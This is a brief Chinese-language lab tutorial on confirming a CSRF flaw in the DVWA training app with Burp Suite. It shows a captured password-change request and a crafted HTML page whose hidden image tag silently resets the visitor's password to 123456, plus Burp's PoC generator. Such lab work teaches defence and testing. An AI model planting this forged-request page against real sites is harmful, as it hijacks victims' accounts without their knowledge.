CSRF 漏洞验证

环境准备：

dvwa csrf 为例

burpsuite 工具

dvwa靶场（CSRF）

方法一：

1.修改密码抓包

这里是为了理解先抓包查看修改密码时的数据

GET /dvwa_2.0.1/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change HTTP/1.1

2.构造网页：

        这里我们修改密码为123456.

<meta charset='utf-8'>
<img src='../1.jpg'><br />
<img src='http://10.9.47.44/dvwa_2.0.1/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change'
alt='宝刀在手，谁与争锋'>

3.打开网页

这时密码已经被修改了

抓包查看和修改密码的内容一样

4.登录验证

看到我们是利用123456登录的

方法二：

1.修改密码时抓包。

2.自带生成代码

3.复制链接

4.访问使用

点击修改（用来验证是否存在CSRF漏洞）